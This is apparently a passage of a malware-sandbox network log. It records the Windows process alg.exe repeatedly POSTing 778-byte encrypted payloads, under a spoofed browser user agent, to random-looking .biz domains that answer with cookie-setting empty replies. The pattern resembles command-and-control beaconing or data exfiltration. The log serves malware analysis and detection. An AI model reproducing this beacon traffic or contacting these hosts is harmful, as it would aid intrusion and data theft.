                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:41.640803099 CET358OUTPOST /sduodvbdxsrqja HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: eufxebus.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:41.640830994 CET778OUTData Raw: e1 9a d1 f7 51 4c f5 20 fe 02 00 00 82 88 aa c8 ae 87 61 c9 cd 58 e3 a7 ac bd c9 c9 96 f6 06 fd ef 0a 01 2a 2d 84 e2 40 33 53 4d a1 75 7f 45 0e 26 42 e9 2a d5 d1 ac 26 02 db 47 c0 54 a6 b7 e4 1e 85 fe 02 92 24 f3 5d 36 36 46 6e b9 4f 1e 95 80 de
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: QL aX*-@3SMuE&B*&GT$]66FnOR,#vm>9_gLzr1y!lgq6p4N#cLZ#C.Q>J`vju.OAgO6U?F~OxVFC"PN<4'f$?s
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:43.059278965 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:42 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=d6cdca91d20216e2c232262d723205ee|155.94.241.188|1730130702|1730130702|0|1|0; path=/; domain=.eufxebus.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  63192.168.2.55003934.246.200.160802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:43.085338116 CET348OUTPOST /guistk HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: pwlqfu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:43.085338116 CET778OUTData Raw: 36 6e 6f 1d ed 22 05 82 fe 02 00 00 2d 59 fc ba a3 f6 27 17 5b 85 ee fc 8f f3 81 ec b4 ae d2 61 1a cc 94 da b5 96 ab f9 2c da b5 31 11 d3 61 8e 63 fe 86 10 22 73 a4 71 0c 56 64 f0 0a 48 3f 29 42 fe 44 18 74 e4 4b 26 b6 d3 c9 ed 89 5f aa 33 13 34
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 6no"-Y'[a,1ac"sqVdH?)BDtK&_34 ?P&eF+CM7Velu+nV#>:W$U*g:M1?C:yK+s'~&yD.x[i5D `L{m% ^Y[
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:44.062854052 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:43 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=afeebabb8ada25940beeb5e9d71b8cfb|155.94.241.188|1730130703|1730130703|0|1|0; path=/; domain=.pwlqfu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  64192.168.2.55004047.129.31.212802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:44.085705042 CET353OUTPOST /taltetnl HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: rrqafepng.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:44.085737944 CET778OUTData Raw: f7 64 5b 6f 3b ec 08 d7 fe 02 00 00 8a e3 4a bc 4a d5 2f 9f 48 b1 d8 5d da 21 97 0a e7 3e f1 7c 91 5f bb 3f 3b 37 6e 55 ec ec f7 00 8d 50 bf ce f6 85 37 28 05 6f 3e e2 14 43 e4 3f 1a 2a 2c 28 d4 da d9 3f a6 5c a8 d2 64 e8 37 22 56 b1 00 d0 20 37
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: d[o;JJ/H]!>|_?;7nUP7(o>C?*,(?\d7"V 7sP%x$?bRaA2w.XE+swm1N=XZl-"Eu;/Q8 *.7R3*h&Ix$@t! t =#zo2
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:45.517138004 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:45 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=5aa9f8852031495d19eae109a4e83556|155.94.241.188|1730130705|1730130705|0|1|0; path=/; domain=.rrqafepng.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  65192.168.2.5500413.94.10.34802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:45.539834976 CET345OUTPOST /s HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: ctdtgwag.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:45.542960882 CET778OUTData Raw: 80 ff 7c 8a 80 2f a0 44 fe 02 00 00 3d 6b 6d 04 ac 9d b0 1c 84 2b e1 4a ef 6d 92 12 0c 8a 0d 91 d3 d4 82 66 22 3f f8 2b e3 0f 54 84 90 ef d3 34 1f e5 97 79 9e 94 39 3b 5e 35 b5 96 2e 3e 38 73 30 02 ff 6b 62 ec 88 a4 13 36 7c 12 74 1d 0e a0 66 8c
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: |/D=km+Jmf"?+T4y9;^5.>8s0kb6|tfU%sj.~Y^W5<1Jej`h|=w<e=7C\Jvmo|Dr=N'GG5R=@U,Wdn/h,RW]":dU[4q2
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:46.217255116 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:46 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=a88bdcd6f3a9bd870a8417fe81033487|155.94.241.188|1730130706|1730130706|0|1|0; path=/; domain=.ctdtgwag.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  66192.168.2.55004235.164.78.200802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:46.264581919 CET357OUTPOST /yasnhmosjfaqm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: tnevuluw.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:46.264606953 CET778OUTData Raw: ac e7 af 9c f3 c6 3c be fe 02 00 00 57 2c 34 f6 83 9d 4b 67 53 69 6e 81 dc bb 65 b8 b3 7f 45 d9 30 5f d4 f7 f2 8e d8 97 ff d1 aa 95 e3 8d 57 35 b8 51 76 1b d5 a6 08 d0 62 55 9f ee d7 24 a9 a9 fc 52 4b 56 4b a9 04 ad b3 2b cd 65 13 4c 49 ea 04 d6
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: <W,4KgSineE0_W5QvbU$RKVK+eLI^4-Vx9]^XLvAjkj,h#!?5#dE0j61R^6]8@RJ.`q4x9"(]<ST`u2Zz-vg!"i2G?
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:47.093986988 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:46 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=7506ed47ac33bd476a649b593811e1a5|155.94.241.188|1730130706|1730130706|0|1|0; path=/; domain=.tnevuluw.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  67192.168.2.55004318.141.10.107802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:47.212018013 CET347OUTPOST /oogcd HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: whjovd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:47.212018013 CET778OUTData Raw: d4 86 db 0e 90 a3 d2 81 fe 02 00 00 4d 11 6f 39 24 b0 1f 41 ed 8a 0b 18 f7 90 a1 77 23 a6 98 53 90 e2 96 0b a2 55 75 ae 90 4a 67 68 d6 62 92 6a e7 68 ca 85 58 3b 3b 32 18 08 d0 8a 20 c6 b0 85 67 54 ea 87 a7 8b 47 f4 8f ca d9 a6 73 f5 dc b0 58 1f
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: Mo9$Aw#SUuJghbjhX;;2 gTGsXkw\|TJqT%<[JuE^4~W{Y8ZAC6+kjM{KWOtck|52aR^G\7cz$ON'k{F&3]1Tf
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:48.629209042 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:48 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=8dff23a9b5d1dde2d75e12504c62f33b|155.94.241.188|1730130708|1730130708|0|1|0; path=/; domain=.whjovd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  68192.168.2.55004444.221.84.105802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:48.959253073 CET351OUTPOST /srbpajvg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: reczwga.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:48.959253073 CET778OUTData Raw: 27 f5 37 5e 5a 84 57 d6 fe 02 00 00 f9 3b d4 d4 e8 07 b8 90 0f ae 42 93 cc 99 6b 25 61 e3 51 29 10 fb 29 72 c5 bd 5a 2c 42 e4 a1 2b e9 50 8c 83 a8 dd 3e d6 91 d6 b9 ec 4e 2e fd 10 e7 b3 45 ec 3c 6a e3 1f 7b 2c 6c 43 2d 34 a6 96 d6 b4 b4 87 12 40
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: '7^ZW;Bk%aQ))rZ,B+P>N.E<j{,lC-4@DN)olvk_&l]$LI O(y8Ir5LsN<@e8req}Yd|!So++k8Gtt[j[0ap*q=>'ImRF
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:49.634098053 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:49 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=94243503b8cc9a3ec2a670ef8a1e4ddc|155.94.241.188|1730130709|1730130709|0|1|0; path=/; domain=.reczwga.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  69192.168.2.55004534.211.97.45802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:49.841701031 CET343OUTPOST /i HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: bghjpy.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:49.841715097 CET778OUTData Raw: 50 ad 65 05 3e f5 9a 80 fe 02 00 00 9f 64 8e df 93 37 59 13 18 64 11 90 dd 1f d0 1a 9b 9b 09 35 c7 70 44 b0 eb 0e e3 d1 19 d3 28 ec d0 4a e1 28 a5 08 47 5f c4 00 91 55 73 49 70 20 d4 95 ab 7c c0 e0 4c 56 74 6a fb 96 49 c1 cc 21 09 38 ec db e6 f7
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: Pe>d7Yd5pD(J(G_UsIp |LVtjI!8!tE_D\o(F'!9j)`A7!?dtZ1M]ti\`{$Fc+G_{T9~1<PvJEUm_,S).5xr
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:50.903523922 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:50 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=cced32451f2dd47d89292eaf67424b65|155.94.241.188|1730130710|1730130710|0|1|0; path=/; domain=.bghjpy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  70192.168.2.55004618.208.156.248802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:50.923712015 CET351OUTPOST /dnmujj HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: damcprvgv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:50.923747063 CET778OUTData Raw: 45 52 d0 16 ef 98 77 f9 fe 02 00 00 e4 53 c1 63 55 f6 51 4e 61 94 c8 72 46 2f de e5 86 75 ca 1b 92 b2 94 d5 84 fa 7a 4c 10 d5 a7 8d b3 ec cf 15 9e 19 4f d8 82 69 c0 b5 4a 60 21 12 2e 89 b6 56 3a a8 45 bb 55 b6 20 ec d7 50 b9 47 7a b8 00 b5 35 4e
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: ERwScUQNarF/uzLOiJ`!.V:EU PGz5NKvHI/Ij~I_`7X\g:5L-{U(p~fPTN?:sVa!|Awp,cXtQN'eoU8gtrY> Qdkn
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:51.627598047 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:51 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=a5c475f4b7b33185b36d930d1f668fbe|155.94.241.188|1730130711|1730130711|0|1|0; path=/; domain=.damcprvgv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  71192.168.2.5500473.254.94.185802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:51.648871899 CET345OUTPOST /jw HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: ocsvqjg.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:51.648905039 CET778OUTData Raw: 71 3a 04 29 62 2e 13 73 fe 02 00 00 42 e2 53 2b d4 dd f8 36 d7 fc f2 36 cb 2d 91 00 fb f8 82 b4 68 8b f3 60 85 69 6e 3b 04 49 ea 69 3b 77 3d f6 82 a1 53 fa a2 1b 08 4b df 5c 86 c3 70 3e da bb 61 b6 93 50 e3 0d 29 d4 73 96 26 14 5e 91 a7 01 27 c8
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: q:)b.sBS+66-h`in;Ii;w=SK\p>aP)s&^'cjee:8W@o%lAl%cRPqTF|2Rq b)cs,XR%.Fbtf&.nR[5m>9P2rdc &~
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:52.612293959 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:52 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=da41906060fa2e0f2078de0300e2016e|155.94.241.188|1730130712|1730130712|0|1|0; path=/; domain=.ocsvqjg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
